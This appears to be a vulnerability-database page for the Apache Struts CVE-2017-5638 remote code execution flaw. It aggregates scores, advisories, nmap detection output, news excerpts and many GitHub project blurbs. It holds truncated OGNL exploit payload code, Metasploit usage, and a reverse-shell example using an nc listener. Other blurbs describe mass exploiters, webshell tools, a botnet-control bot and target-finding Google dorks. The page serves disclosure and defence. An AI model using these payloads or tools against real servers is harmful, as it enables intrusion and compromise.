10
CVSSv2

CVE-2017-5638

Published: 11/03/2017 Updated: 04/03/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Jakarta Multipart parser in Apache Struts 2 2.3.x prior to 2.3.32 and 2.5.x prior to 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerability Trend

Affected Products

Vendor Product Versions
ApacheStruts2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.1, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.5, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10

Vendor Advisories

On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value This vulnerability has been assigned CVE-ID CVE-2017-5638 This advisory is availabl ...
A flaw was reported in Apache Struts 2 that could allow an attacker to perform remote code execution with a malicious Content-Type value ...
Remote code execution vulnerability via Apache Struts 2   Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2 Successful exploitation of this issue may result in the complete compromise of an affected product ...

Exploits

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')" payload += "(#dm=@ognlOgnlContext@DEFAULT_MEMBER_ACCESS)" payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['comopensymphonyxwork2Action ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update ...

Mailing Lists

Apache Struts 2 versions 23x before 2332 and 25x before 25101 remote code execution exploit that provides a reverse shell ...

Nmap Scripts

http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).

nmap -p <port> --script http-vuln-cve2017-5638 <target>

PORT STATE SERVICE 80/tcp open http | http-vuln-cve2017-5638: | VULNERABLE | Apache Struts Remote Code Execution Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2017-5638 | | Disclosure date: 2017-03-07 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 | https://cwiki.apache.org/confluence/display/WW/S2-045 |_ http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

Metasploit Modules

Apache Struts Jakarta Multipart Parser OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_content_type_ognl
      msf exploit(struts2_content_type_ognl) > show targets
            ...targets...
      msf exploit(struts2_content_type_ognl) > set TARGET <target-id>
      msf exploit(struts2_content_type_ognl) > show options
            ...show and set options...
      msf exploit(struts2_content_type_ognl) > exploit

Github Repositories

cve-2017-5638 cve-2017-5638 Vulnerable site sample This project aims to demonstrate the CVE-2017-5638 exploitation for educational purpose For more informations, see cwikiapacheorg/confluence/display/WW/S2-045 Legal Disclaimer This project is made for educational and ethical testing purposes only Attacking targets without prior mutual consent is illegal It is the e

apache-struts2-CVE-2017-5638 Demo Application and Exploit Sample Apache Struts2 App Struts2-showcase: mvnrepositorycom/artifact/orgapachestruts/struts2-showcase/2312 Exploit Reference: githubcom/rapid7/metasploit-framework/issues/8064

CVE-2017-5638 CVE-2017-5638 (PoC Exploits)

cve-2017-5638 참고_1 참고_2 참고_3 참고_4

CVE-2017-5638 | Struts s2-045 Description It is possible to perform a RCE attack with a malicious Content-Type value If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user Affected versions Struts 235 Struts 2331 Struts 25 Struts 2510 Exploitation Remediation To remediate this issue, update the affec

CVE-2017-5638 Apache Struts 235 &lt; 2331 / 25 &lt; 2510 - Remote Code Execution - Shell Script The Jakarta Multipart parser in Apache Struts 2 23x before 2332 and 25x before 25101 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Ty

Modded-Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638-AUTO-EXPLOITER

Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner

struts-rce-cve-2017-5638 Struts-RCE CVE-2017-5638 This is a modified exploit that creates a webshell and provides a bash/cmd like interface to interact with the webshell in the console

CVE-2017-5638 Apache Struts 235 &lt; 2331 / 25 &lt; 2510 - Remote Code Execution - Shell Script The Jakarta Multipart parser in Apache Struts 2 23x before 2332 and 25x before 25101 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Ty

Struts-Apache-ExploitPack These are just some scripts which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638) There is a MassScanner and Exploiter, You can use scanner to Mass Scan a list of URLs and then exploit them by Exploiter The Exploiter will run arbitrary shell commands on the vulnerable server

POC Exploit for CVE-2017-5638 Only use this exploit on systems you own or have explicit rights to test Installation If you have go already installed on your computer, go get is the way to go go get githubcom/Greynad/struts2-jakarta-inject Usage Single command execution struts2-jakarta-inject -u &lt;url&gt; -c 'id' Pseudo interactive shell struts2-jakarta-inje

CVE-2017-5638 strutsapacheorg/docs/s2-016html cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017 Metasploit Framework Exploit Module for Apache Struts Content-Type exploit Have not tested against a windows server but tested against a linux server using the payload of generic/shell_bind_tcp

StrutsShell Apache Struts (CVE-2017-5638) Shell Introduction The "LowNoiseHG (LNHG) Struts Shell" ("StrutsShell" from now on) was conceived in March 2017 after realizing the usefulness of not having to exploit Apache Struts CVE-2017-5638 manually (HTTP GET requests by hand) and after realizing the respective metasploit module for this vulnerability did not w

Apache-Struts An exploit for Apache Struts CVE-2017-5638 Usage Testing a single URL python struts-pwnpy --url 'examplecom/struts2-showcase/indexaction' -c 'id' Nmap Recong nmap -p &lt;port&gt; --script http-vuln-cve2017-5638 &lt;target&gt;' Testing a list of URLs python struts-pwnpy --list 'urlstxt' -c 'id�

struts-pwn An exploit for Apache Struts CVE-2017-5638 Usage Testing a single URL python struts-pwnpy --url 'examplecom/struts2-showcase/indexaction' -c 'id' Testing a list of URLs python struts-pwnpy --list 'urlstxt' -c 'id' Checking if the vulnerability exists against a single URL python struts-pwnpy --check --url 'h

strutser This program checks for CVE-2017-5638 Usage Usage of /strutser: Usage of /strutser: -c, --concurrency int Concurrent HTTP requests (default 10) -f, --file string File containing targets -p, --ports intSlice Ports to check (default [80]) -t, --timeout int Timeout on HTTP requests (default 15) Tips For multiple ports, use the --ports argum

cve-2017-5638

CVE-2017-5638 Apache Struts2 Example PoC Exploit PHP Code for CVE-2017-5638 Usage php exploitphp "127001:8080/example/indexaction" "command" ** USE AT YOUR OWN RISK**

remote-code-execution-sample Example shows how to use the Java Security Manager to prevent remote code execution exploits Intro to the Problem The Problem: Equifax Breach, 143 million Americans’ personal info, including names, addresses, dates of birth and SSNs compromised Only a veneer of security was in place The Exploit The vulnerability Apache Struts, CVE-2017

S2-045 Struts2 S2-045 Vulnerability environment

CVE-2017-5638 PoC Code in Python | DORK: ext:action Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action USAGE: python strutspy victimsite dir The initial Python Script that was Posted didn't correctly format the Content-Type Header I recoded the Content Type Header to properly format Content-Type:%20{Exploit} I also added a logging and

Apache Struts2 Vulnerability | CVE-2017-5638 | Version 25 Disclaimer This is meant for educational, and research purposes only I do not authorize or endorse any illegal or unethical use of this projects contents or information Instructions To run the webapp: java -jar ms-cybersecurity-1jar (uses embedded Tomcat) Java 18 the webapp boots on port 8080 by default (loca

S2-045 RCE Usage:python CVE-2017-5638-S2-045py url 脚本功能仅限命令执行,while死循环解决了多次命令执行的交互方式

S2-045 CVE-2017-5638 Exploit 修复方案 检测方式查看web目录下/WEB-INF/lib/目录下的struts-corexxjar ,如果这个版本在Struts235 到 Struts2331 以及 Struts25 到 Struts2510之间则存在漏洞, 更新至Strusts2332或者Strusts25101,或使用第三方的防护设备进行防护。

~ ExpStruts ExpStruts is a php-based mass exploiter for CVE-2017-5638 Screenshot(s) Requirements ~ Python3 for MakMan's Google Scraper ~ Abk Khan [ @asystolik ]

struts2_cve-2017-5638 This is a sort of Java porting of the Python exploit at: wwwexploit-dbcom/exploits/41570/ This software is written to have no external dependencies DISCLAIMER This tool is intended for security engineers and appsec guys for security assessments Please use this tool responsibly I do not take responsibility for the way in which any one uses thi

Apache-Struts An exploit for Apache Struts CVE-2017-5638 Usage Testing a single URL python struts-pwnpy --url 'examplecom/struts2-showcase/indexaction' -c 'id' Nmap Recong nmap -p &lt;port&gt; --script http-vuln-cve2017-5638 &lt;target&gt;' Testing a list of URLs python struts-pwnpy --list 'urlstxt' -c 'id�

#Tool to exploit security bug CVE-2017-5638 #Install Dependencies easy_install requests easy_install termcolor Contacto Para contactarse conmigo @saamux con cualquier pregunta o sugerencia

Common-Vulnerability-and-Exploit-5638 This is the Apache Struts CVE-2017-5638 struts 2 vulnerability The same CVE that resulted in the equifax database breach A write up on how to apply, and patch against this exploit

Stutsfi An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2

#Struts2 Content-Disposition filename null-byte variant of CVE-2017-5638 Struts2 Security Bulletin S2-046 A null byte (\x00) in a request¡¯s Content-Disposition header filename field can trigger a InvalidFileNameException with the same (client controlled) filename string in the exception message that be used can trigger OGNL evaluation during error handling Note tha

CVE-2017-5638 CVE: 2017-5638 in different formats Most of them will require you to enter the url and you might want to change the command Please issue pull requests if you can make it so you can enter a url and command! PHP - Example localhost/2017-5638php?url=TARGET&amp;cmd=command XMLHttpRequest - CVE-2017-5638js -- will require Access-Control-Allow-Origin on tar

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X test struts2 vulnerability CVE-2017-5638 in Mac OS X ###download test web app and run it in tomcat #install tomcat brew install tomcat #confirm where the tomcat installed ls -lF `which catalina` #confirm tomcat home dir ls -lF /usr/local/Cellar/tomcat/8511/libexec #create web app "struts2" in webapps of tomcat

Struts-Apache-ExploitPack These are just some scripts which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638) There is a MassScanner and Exploiter, You can use scanner to Mass Scan a list of URLs and then exploit them by Exploiter The Exploiter will run arbitrary shell commands on the vulnerable server

OgnlContentTypeRejectorValva This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)

Apache Struts CVE-2017-5638 exploitation This simple web application is built with vulnerable Apache Struts 2510 (CVE-2017-5638) It’s vulnerable to RCE Starting web application To start vulnerable web application, execute: mvn jetty:run The application will be accessible on port 8012 by default You can change it: mvn -Djettyhttpport=&lt;port&a

apache-struts-v2-CVE-2017-5638 Working POC for CVE 2017-5638 This repo contains a working python example demonstrating the RCE capabilities of CVE 2017-5638 Also for reference is included the Struts Showcase WAR file

Struts2Shell An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug Installation $ npm install -g struts2shell Installation as Library $ npm install struts2shell Command Line Options -h, --help output usage information -V, --version output the version number -u, --url [target] URL to Attack -c, --cmd [command] Command to Execute Usage as Li

CVE-2017-5638 Google Dork : "site:com filetype:action"

Strutsy Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability Includes blind and time based code injection techniques which significantly reduces false negatives Other features include mass URL imports to scan multiple targets in one go Usage: python strutsypy urlstxt windows/linux/default ip-address All parameters are required urlstxt - file contai

I extended Scott Campbell's script further, made it more complicated :) While "HTTP_StrutsAttack" will stop 100% of the recon, there was still miniscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, vulnerable system might still do the wget included in the HTTP request and execute the malware Since we aren't blo

Apache-Struts-2-CVE-2017-5638-Exploit This exploit exploits the Apache Struts2 vulnerability (CVE-2017-5638), allowing us to execute commands remotely on the apache server How to use: $ sudo python Struts2_Shell001py ******************************************* * [!] Exploit Apache Struts2 {*}DEMO * *******************************************

CVE-2017-5638

CVE-2017-5638 Google Dork : "site:com filetype:action"

cve-2017-5638 Demo app of THAT data broker's security breach

#Struts2 S2-045 (CVE-2017-5638) Exp Tools #Exp Function: Command Execute Get Target Website's Physical Path File Upload Getshell Default Webshell For Chopper Support HTTP/HTTPS Support URL With Any Port Note: Default Webshell's Password is s2045@exp #Notice The Project Is Intended For Educational/Research Purposes Mail: flyteas@gmailcom

CVE-2017-5638 Apache Struts 20 RCE vulnerability This is a script to exploit CVE-2017-5638 - It allows an attacker to inject OS commands into a web application through the content-type header Apache Struts 2 is an open-source web application framework for developing Java EE web applications It uses and extends the Java Servlet API to encourage developers to adopt a model&ndas

strutszeiro Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) #Dependencies pip install -r requerimentstxt #Config Create a telegram bot, save the API token in config/tokenconf Create a telegram group, save the group id in config/groupconf #Start python strutszeiropy #Telegram Usage /add url - test vulnerability and add the new server /exploit

Exploit Demo for CVE-2017-5638 Completely based on githubcom/piesecurity/apache-struts2-CVE-2017-5638 Usage: Pre-requisites: have python, docker, maven and a jdk installed clone this repo run mvn clean package in project root run docker build -t hack run docker run -d -p 8080:8080 hack once container comes online - verify by running in browser To begin testing RCE

CVE-2017-5638 This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock This is a completely harmless as it does not inject any malicious payload, only inject an HTTP header named 'STRUTS2-VALIDATION' in order to be able to validate whether is vulnerable Because of its multithread capability, it's able to run 25k+ appli

#CNVD-ID CNVD-2017-02474 发布时间 2017-03-07 危害级别 高 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 影响产品 Apache struts &gt;=235,&lt;=2331 Apache struts &gt;=25,&lt;=2510 CVE ID CVE-2017-5638 漏洞描述 Apache Struts是一款用于创建企业级Java Web应用的开源框架。 Apache Struts2存在S2-045远程代码执行漏洞。远程攻击者

CVE-2017-5638 Table of Contents Overview Dependencies Usage Overview This project is a prove-of-concept for the Apache Struts vulnerabilty The goal was to create software that can generate and test random IPs for the vulnerabilty described above Use this project on your own risk and for educational purpose only Dependencies cURL cURL is used to send the crafted header t

S2-046_POC Usage: /s2_046sh [url] /s2_045sh [url] Sample: chmod +x /s2_046sh /s2_046sh 17216152135/indexaction OUTPUT: ================HTTP GET Method================ uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_j

Vulnerable Struts2 application Requirements Maven (mavenapacheorg) Struts &lt;= 2510 CVE-2017-5638 - Apache Struts 2 Multipart form RCE Requirements Locate a URL that issues a multipart form POST Getting Started The application / server can be started with the following maven command: mvn jetty:run Run the exploit (wwwexploit-dbcom/exploits/41570

CVEPoC's List of software CVE's with some "testing code" alongside an "testable" real web app implementing these vulnerabilities Command Injections: C 1 CVE-2016–3714 ==&gt; Imagetragick RCE Argument Injections: PHP 1 CVE-2016-10033 ==&gt; PHPMailer + Wordpress 46 RCE Code Injections: JAVA 1 S2-046_CVE-2017-5638 ==&gt; Stru

cve-testing

S2-Reaper This project is used to collect vulnerable URLs that affected by Struts2 S2-045 from the Google search results Usage python reaperpy About The reaperpy will run a google search crawler with keywords definded at crawlerconf to find vulnerable URLs crawlerconf base_url : the basic google search url keyword : eg site:gov ext:action expect_num : expect search res

Overview Git repository for grey hat hacking talk Agenda What is a hacker What is grey hat hacking Why is it important (survey of fortune 500 companies) Talk about equifax hack link Run the equifax hack Show them the code Walk though what it does Run the exploit against a server Show the results Decode the passwords Talk about how it was executed and the fallout for equifax

Strutshock Usage strutshock examplecom/indexaction

Struts2-045-Exp Struts2-045利用脚本 仅供测试使用 usage:python3 struts2-045-exppy url cmd

A Vulnerable Apache Struts Application Confirmed Vulnerabilities CVE Description URL 2017-5638 Remote Command Vulnerability in Apache Struts cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-5638 Requirements: Vagrant VirtualBox SearchSploit (Optional) Setup $ git clone githubcom/evolvesecurity/vuln-struts2-vmgit $ cd vuln-struts2-vm Build Virtual M

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution Reverse shell from target Author: anarc0der - githubcom/anarcoder Tested with tomcat8 Install tomcat8 Deploy WAR file githubcom/nixawk/labs/tree/master/CVE-2017-5638 Ex: Open: $ nc -lnvp 4444 python2 struntsrcepy --target=localhost:8080/struts2_23151-showcase/showcaseaction --ip=127001 --

DevSecOps Pipeline Demo Requirements This demo uses Virtual box to deploy a local GitLab instance and configure it to run a DevSecOps Pipeline demo This demonstrates a DevSecOps Pipeline using an application that contains the Struts2 vulnerability (CVE-2017-5638) made famous in the Equifax breach Pre-requisites VirtualBox Vagrant Python You will also need the Vagrant Host

check_struts This project has been created following 2017 Equifax exploit The check_strutssh script aims at retrieving any Apache struts libraries version and location found and/or loaded on the system It can be run directly on a server, or with the provided Ansible playbook, to handle several servers Possible Outputs: "Libs path and versions loaded on the system:&quo

Kubernetes security presentation This repository contains manifest files for a presentation about Kubernetes security held at a meetup of the "München Kubernetes/Cloud-Native Meetup" group In order to deploy the sample application: kustomize build sample-app/base | kubectl apply -f - In order to deploy the sample application with security context in place:

Commandline Emulator | CVE-2017-5638 Disclaimer This is meant for educational, and research purposes only I do not authorize or endorse any illegal or unethical use of this projects contents or information Proof of concept command line emulator to deliver payloads for CVE-2017-5638 Instructions Run: java -jar Sendjar Url: localhost/Webapp/action Supports most ba

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution Reverse shell from target Author: anarc0der - githubcom/anarcoder Tested with tomcat8 Install tomcat8 Deploy WAR file githubcom/nixawk/labs/tree/master/CVE-2017-5638 Ex: Open: $ nc -lnvp 4444 python2 struntsrcepy --target=localhost:8080/struts2_23151-showcase/showcaseaction --ip=127001 --

StrutsExp Usage strutsexp examplecom/indexaction

CVE-shellshock Common Vulnerabilities and Exposures Big CVEs in the last 5 years CVE-2014-0160 - Heartbleed The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet SSL/TLS provides communication se

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Penetration Testing Methodology Penetration testing Process, Methods and Real world Attacks Collections Framework and Testing Guide OWASP - Open Web Applicaiton Security Project PTES- Penetration Testing Execution Standard PCI DSS PCI Penetration Testing Guide PTF - Penetration Testing Framework OSSTMM - Open Source Security Testing Methodology Manual Pre Engagement VMware

CVE-2018-11776-Python-PoC hook-s3c (githubcom/hook-s3c), @hook_s3c on twitter Working Python test and PoC for CVE-2018-11776, originally appearing on; githubcom/hook-s3c/CVE-2018-11776-Python-PoC What's going on? Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request Versions affected are 2

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php Funcion Terminada :) jsp Funcion en desarrollo CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:�

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

FwdSh3ll FwdSh3ll is a tiny open source web-payload oriented exploitation framework for crafting forward shells with Metasploit-like usage experience What is a forward shell? Have you ever been caught in a situation when looking for an approach to a CTF box, you discover an RCE vulnerability in a web app but despite that you can't get a reverse shell no matter how har

Apache-Struts-v3 Script contiene la fusión de 3 vulnerabilidades de tipo RCE sobre ApacheStruts, además tiene la capacidad de crear shell servidor SHELL php terminado jsp proceso CVE ADD CVE-2013-2251 'action:', 'redirect:' and 'redirectAction' CVE-2017-5638 Content-Type CVE-2018-11776 'redirect:' and 'redirectAction

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc Requirements Python &gt;= 27x urllib3 ipaddress Installation on Linux\Mac To install the latest version of JexBoss, please use the

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

cve-2014-0050 CVE-2014-0050 Vulnerable site sample This project aims to demonstrate the CVE-2014-0050 exploitation for educational purpose For more informations, see : wwwtrustwavecom/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/ githubcom/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intruder Some exploits You might also like : Methodology and Resources

ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities DEMO VIDEO: FEATURES: Automatically collects basic recon (ie whois, ping, DNS, etc) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-doma

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intruder Some exploits You m

Payloads All The Things A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques ! I &lt;3 pull requests :) You can also contribute with a beer IRL or with buymeacoffeecom Every section contains: READMEmd - vulnerability description and how to exploit it Intruders - a set of files to give to Burp Intrude

环境 Requires Java 18+ and Maven 3x+ 使用方法 1下载 git clone gitoschinanet/0d/Struts2_bugsgit 2查看远程分支 git branch -a 3切换到分支 git checkout 分支名 如git checkout S2-046 4打包 mvn clean package 5部署在Tomcat中 将\target中生成的Struts2-046war复制到Tomcat下的webapps目录中,然后开启Tomcat 访问12700

ABOUT: Kn0ck is an automated scanner that can be used during a penetration testing to enumerate and scan for vulnerabilities KN0CK FEATURES: Automatically collects basic recon Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks f

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding) Edge Side Includes XML input handling Suspicious input transformation (eg

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Recent Articles

Panda Threat Group Mines for Monero With Updated Payload, Targets
Threatpost • Lindsey O'Donnell • 17 Sep 2019

The Panda threat group, best known for launching the widespread and successful 2018 “MassMiner” cryptomining malware campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.
While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services...

Equifax to Pay $700 Million in 2017 Data Breach Settlement
Threatpost • Lindsey O'Donnell • 22 Jul 2019

Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.
The consumer credit reporting agency on Monday said it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover ...

EternalBlue Exploit Serves Beapy Cryptojacking Campaign
BleepingComputer • Ionut Ilascu • 25 Apr 2019

A cryptojacking campaign uses NSA's leaked DoublePulsar backdoor and the EternalBlue exploit to spread a file-based cryptocurrency malware on enterprise networks in China.
Dubbed Beapy by researchers at Symantec, the campaign was reported by other security companies before. Qihoo 360's research team published details about it and a Trend Micro report followed in mid-April.
However, information from Symantec adds details about the type of victims and attacker's motivation to use a fi...

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2019

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 20196 Min ReadThreat Intelligence SubscribeFollowtwitterfacebooklinkedinBeapy: Cryptojacking Worm Hits Enterprises in ChinaCryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

New Mirai Variant Comes with 27 Exploits, Targets Enterprise Devices
BleepingComputer • Sergiu Gatlan • 18 Mar 2019

A new Mirai variant comes with eleven new exploits, the enterprise WePresent WiPG-1000 Wireless Presentation system and the LG Supersign TV being the most notable new devices being targeted.
A previous report by Palo Alto Networks' Unit 42 from September saw a strain of the Mirai botnet switching targets to attack Apache Struts servers using an exploit also employed during last year's Equifax breach, while a new Gafgyt version was observed while assailing SonicWall firewalls, as ...

Mirai, Gafgyt IoT Botnets Reach To the Enterprise Sector
BleepingComputer • Ionut Ilascu • 11 Sep 2018

Mirai and Gafgyt, two of the best known IoT botnets, have forked once again, with the new variants peeking at the enterprise sector for creating or replenishing their denial-of-service resources for distributed attacks.
The code for both malware pieces reached the public space a few years back and aspiring cybercriminals began spawning their own revisions.
Most of the times there is nothing interesting about the mutations, but the latest alternatives show a predilection for business ...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

Active Attacks Detected Using Apache Struts Vulnerability CVE-2018-11776
BleepingComputer • Catalin Cimpanu • 28 Aug 2018

